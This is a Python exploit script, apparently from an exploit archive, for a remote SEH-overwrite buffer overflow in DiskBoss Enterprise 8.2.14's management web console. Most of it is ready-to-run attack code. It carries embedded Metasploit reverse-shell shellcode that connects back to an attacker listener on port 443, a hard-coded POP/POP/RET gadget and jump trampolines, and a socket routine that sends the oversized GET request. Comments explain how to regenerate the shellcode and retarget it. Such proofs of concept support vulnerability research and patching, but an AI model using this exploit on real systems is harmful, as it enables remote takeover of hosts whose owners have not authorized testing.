DiskBoss Enterprise 8.2.14 Remote Buffer Overflow (SEH overwrite via an over-long GET path to the management web console)
Posted on 01 August 2017
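#!/usr/bin/env python
# Exploit Title: DiskBoss Enterprise v8.2.14 Remote buffer overflow
# Date: 2017-07-30
# Exploit Author: Ahmad Mahfouz
# Author Homepage: www.unixawy.com
# Vendor Homepage: http://www.diskboss.com/
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.2.14.exe
# Version: v8.2.14
# Tested on: Windows 7 SP1 x64
# Category: Windows Remote Exploit
# Description: DiskBoss Enterprise with management web-console enabled can lead
#              to full system takeover.
#
# Mechanics, as far as this script shows them:
#   * A 5000-byte path in "GET /../<path>" sent to the web console overwrites a
#     structured-exception-handler record: nSEH at offset 2492 receives a short
#     forward jump, SEH receives the address of a POP/POP/RET gadget the author
#     located in libpal.dll, and the short jump lands on a near jump that is
#     meant to transfer control to the reverse-shell shellcode placed at the
#     start of the buffer.
#   * The shellcode is x86/alpha_mixed encoded.  Every byte after the 8-byte
#     GetPC stub is alphanumeric, which is presumably why that encoder was
#     chosen for bytes that travel in a URL path (not verifiable from here).
#
# Before reusing this:
#   * The shellcode is the author's: windows/shell_reverse_tcp with
#     LHOST=192.168.72.136 LPORT=443.  Regenerate it for your own listener with
#     the msfvenom line below.  It must stay <= 2492 bytes or the SEH offsets
#     break; build_payload() refuses to run otherwise.
#   * The gadget address 0x1002A8CA and both jump displacements are specific to
#     v8.2.14 on the tested platform.  They assume libpal.dll is loaded at its
#     preferred base and that the handler is not rejected by SafeSEH; re-verify
#     them in a debugger for any other build.
#   * Only run this against systems you are authorized to test.
from __future__ import print_function

import socket
import sys

DEFAULT_PORT = 80        # the PoC targets the management web console on port 80
NSEH_OFFSET = 2492       # bytes from the start of the path to the nSEH field
REQUEST_PATH_LEN = 5000  # total length of the path the PoC sends
CONNECT_TIMEOUT = 10     # seconds; the original blocked forever on a filtered port

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.72.136 LPORT=443 EXITFUN=none -e x86/alpha_mixed -f python
# The first 8 bytes are the decoder's GetPC stub (mov eax,esp / ffree st0 /
# fnstenv [eax-0xc] / pop eax); everything after them is the alphanumeric
# decoder plus the encoded payload.
SHELLCODE = (
    b"\x89\xe0\xdd\xc0\xd9\x70\xf4\x58\x50\x59\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
    b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
    b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
    b"\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x6d\x38\x4c"
    b"\x42\x35\x50\x77\x70\x67\x70\x65\x30\x4b\x39\x6a\x45"
    b"\x36\x51\x59\x50\x61\x74\x6e\x6b\x70\x50\x56\x50\x4e"
    b"\x6b\x30\x52\x64\x4c\x6c\x4b\x71\x42\x72\x34\x6e\x6b"
    b"\x73\x42\x36\x48\x34\x4f\x58\x37\x70\x4a\x54\x66\x36"
    b"\x51\x6b\x4f\x4c\x6c\x57\x4c\x43\x51\x61\x6c\x44\x42"
    b"\x76\x4c\x45\x70\x69\x51\x78\x4f\x46\x6d\x65\x51\x59"
    b"\x57\x6d\x32\x4c\x32\x33\x62\x43\x67\x6c\x4b\x36\x32"
    b"\x74\x50\x4e\x6b\x61\x5a\x55\x6c\x4c\x4b\x30\x4c\x46"
    b"\x71\x43\x48\x68\x63\x67\x38\x55\x51\x6a\x71\x66\x31"
    b"\x4c\x4b\x42\x79\x37\x50\x55\x51\x6b\x63\x4e\x6b\x67"
    b"\x39\x66\x78\x6a\x43\x67\x4a\x37\x39\x6c\x4b\x37\x44"
    b"\x4c\x4b\x77\x71\x6e\x36\x36\x51\x49\x6f\x4c\x6c\x7a"
    b"\x61\x38\x4f\x36\x6d\x66\x61\x6a\x67\x55\x68\x59\x70"
    b"\x42\x55\x4a\x56\x76\x63\x43\x4d\x5a\x58\x37\x4b\x63"
    b"\x4d\x56\x44\x51\x65\x7a\x44\x43\x68\x6e\x6b\x31\x48"
    b"\x37\x54\x56\x61\x58\x53\x51\x76\x6e\x6b\x46\x6c\x62"
    b"\x6b\x6e\x6b\x61\x48\x65\x4c\x46\x61\x5a\x73\x4e\x6b"
    b"\x44\x44\x6c\x4b\x63\x31\x5a\x70\x4f\x79\x61\x54\x37"
    b"\x54\x34\x64\x31\x4b\x43\x6b\x33\x51\x66\x39\x61\x4a"
    b"\x70\x51\x79\x6f\x69\x70\x71\x4f\x31\x4f\x30\x5a\x6c"
    b"\x4b\x45\x42\x48\x6b\x4c\x4d\x31\x4d\x61\x78\x34\x73"
    b"\x57\x42\x75\x50\x43\x30\x73\x58\x72\x57\x61\x63\x67"
    b"\x42\x61\x4f\x73\x64\x61\x78\x50\x4c\x64\x37\x51\x36"
    b"\x34\x47\x69\x6f\x58\x55\x6d\x68\x5a\x30\x36\x61\x75"
    b"\x50\x53\x30\x64\x69\x4b\x74\x61\x44\x66\x30\x35\x38"
    b"\x66\x49\x4d\x50\x32\x4b\x65\x50\x39\x6f\x49\x45\x62"
    b"\x70\x50\x50\x56\x30\x42\x70\x67\x30\x70\x50\x67\x30"
    b"\x52\x70\x70\x68\x78\x6a\x36\x6f\x69\x4f\x49\x70\x69"
    b"\x6f\x4b\x65\x6f\x67\x62\x6a\x35\x55\x51\x78\x6b\x70"
    b"\x6e\x48\x67\x38\x6b\x38\x51\x78\x73\x32\x63\x30\x76"
    b"\x61\x4f\x4b\x4f\x79\x6a\x46\x33\x5a\x56\x70\x63\x66"
    b"\x71\x47\x71\x78\x5a\x39\x4c\x65\x31\x64\x35\x31\x39"
    b"\x6f\x78\x55\x6b\x35\x4b\x70\x52\x54\x64\x4c\x59\x6f"
    b"\x42\x6e\x73\x38\x44\x35\x5a\x4c\x70\x68\x5a\x50\x6f"
    b"\x45\x4e\x42\x73\x66\x59\x6f\x4a\x75\x30\x68\x35\x33"
    b"\x50\x6d\x32\x44\x75\x50\x4f\x79\x69\x73\x73\x67\x70"
    b"\x57\x32\x77\x55\x61\x49\x66\x51\x7a\x64\x52\x61\x49"
    b"\x70\x56\x7a\x42\x49\x6d\x70\x66\x4b\x77\x33\x74\x66"
    b"\x44\x67\x4c\x77\x71\x53\x31\x6e\x6d\x37\x34\x65\x74"
    b"\x34\x50\x39\x56\x73\x30\x33\x74\x62\x74\x52\x70\x61"
    b"\x46\x33\x66\x76\x36\x30\x46\x36\x36\x62\x6e\x32\x76"
    b"\x50\x56\x66\x33\x43\x66\x71\x78\x71\x69\x5a\x6c\x77"
    b"\x4f\x4c\x46\x4b\x4f\x5a\x75\x6e\x69\x59\x70\x62\x6e"
    b"\x30\x56\x67\x36\x6b\x4f\x30\x30\x31\x78\x55\x58\x6c"
    b"\x47\x45\x4d\x71\x70\x59\x6f\x6b\x65\x4d\x6b\x38\x70"
    b"\x38\x35\x6e\x42\x76\x36\x50\x68\x69\x36\x6f\x65\x6d"
    b"\x6d\x6d\x4d\x6b\x4f\x6b\x65\x47\x4c\x36\x66\x63\x4c"
    b"\x75\x5a\x4f\x70\x6b\x4b\x4b\x50\x50\x75\x57\x75\x6f"
    b"\x4b\x43\x77\x62\x33\x70\x72\x32\x4f\x50\x6a\x75\x50"
    b"\x42\x73\x6b\x4f\x39\x45\x41\x41"
)

# SEH record and trampolines, byte-for-byte from the original PoC.
# jmp short +0x10: executes at nSEH, so EIP goes from nSEH+2 to nSEH+18,
# which is exactly where NEAR_JMP sits (4 nSEH + 4 SEH + 10 NOPs).
NSEH = b"\xEB\x10\x90\x90"
# 0x1002A8CA little-endian; "POP EDI / POP ESI / RET 4" in libpal.dll per
# the author.  Version-specific; see the header notes.
SEH = b"\xCA\xA8\x02\x10"
NOP_SLED = b"\x90" * 10
# jmp rel32 with displacement 0xFFFFBF25 = -0x40DB (-16603 bytes).
# NOTE(review): -16603 cannot land inside the ~2.5 KB of data that precede it
# in this buffer, so the author evidently relies on another copy of the
# request sitting at a fixed distance on the stack.  Confirm the landing spot
# in a debugger before changing any size or offset above.
NEAR_JMP = b"\xE9\x25\xBF\xFF\xFF"


def build_payload(shellcode=SHELLCODE):
    """Return the 5000-byte path that overwrites the SEH record.

    Layout (offsets from the start of the path):
        0 .. len(shellcode)-1   shellcode
        len(shellcode) .. 2491  'A' filler
        2492                    nSEH  (short jump forward)
        2496                    SEH   (POP/POP/RET gadget address)
        2500                    10 NOPs
        2510                    near jump (5 bytes)
        2515 .. 4999            'D' filler

    Args:
        shellcode: raw shellcode bytes; must fit below NSEH_OFFSET.

    Raises:
        ValueError: if the shellcode is longer than NSEH_OFFSET.  The original
            silently computed a negative filler count (i.e. no filler) and sent
            a mis-aligned buffer in that case.
    """
    if len(shellcode) > NSEH_OFFSET:
        raise ValueError(
            "shellcode is %d bytes, must be <= %d" % (len(shellcode), NSEH_OFFSET))
    payload = shellcode + b"A" * (NSEH_OFFSET - len(shellcode))
    payload += NSEH + SEH + NOP_SLED + NEAR_JMP
    payload += b"D" * (REQUEST_PATH_LEN - len(payload))
    return payload


def build_request(payload, host=b"4.2.2.2"):
    """Build the raw HTTP/1.1 request that carries *payload* in the path.

    Each request line is terminated with CRLF and the headers are followed by
    an empty line (the published listing had lost the line terminators, which
    would have produced one malformed request line).  Header names are kept
    verbatim from the PoC, misspellings included.

    Args:
        payload: the path bytes from build_payload().
        host: value for the Host header; the PoC hard-codes 4.2.2.2.

    Returns:
        The complete request as bytes.
    """
    lines = [
        b"GET /../" + payload + b" HTTP/1.1",
        b"Host: " + host,
        b"Connection: keep-alive",
        b"Paragma: no-cache",
        b"Cahce-Control: no-cache",
        b"User-Agent: H4X0R",
        b"Referer: http://google.com",
    ]
    return b"\r\n".join(lines) + b"\r\n\r\n"


def main(argv=None):
    """Command-line entry point: ``DB_E_v8.2.14.py <target> [port]``.

    Exit codes match the original: 1 on bad usage, 2 when the TCP connection
    cannot be established.  The optional port argument is new; it defaults to
    DEFAULT_PORT (80).
    """
    args = sys.argv[1:] if argv is None else argv
    print("-----------------------------------------")
    print("- DiskBoss Enterprise v8.2.14 TakeOver -")
    print("- Tested on windows 7 x64 -")
    print("- by @eln1x -")
    print("-----------------------------------------")
    if not args:
        print("Usage ./DB_E_v8.2.14.py 192.168.1.2 [port]")
        sys.exit(1)
    target = args[0]
    try:
        port = int(args[1]) if len(args) > 1 else DEFAULT_PORT
    except ValueError:
        print("Usage ./DB_E_v8.2.14.py 192.168.1.2 [port]")
        sys.exit(1)

    request = build_request(build_payload())
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(CONNECT_TIMEOUT)
    try:
        try:
            sock.connect((target, port))
        except socket.error as exc:
            # The original said "Connction Refused" for every failure; report
            # the real reason (timeout, unreachable, DNS, ...) alongside it.
            print("Connction Refused %s:%s (%s)" % (target, port, exc))
            sys.exit(2)
        print("[*] Connection Success.")
        print("[*] Get nt authority or die hard")
        # sendall(): send() may transmit only part of a 5 KB request and the
        # original never checked its return value.
        sock.sendall(request)
    finally:
        # Always release the socket, including on the sys.exit(2) path above.
        sock.close()


if __name__ == "__main__":
    main()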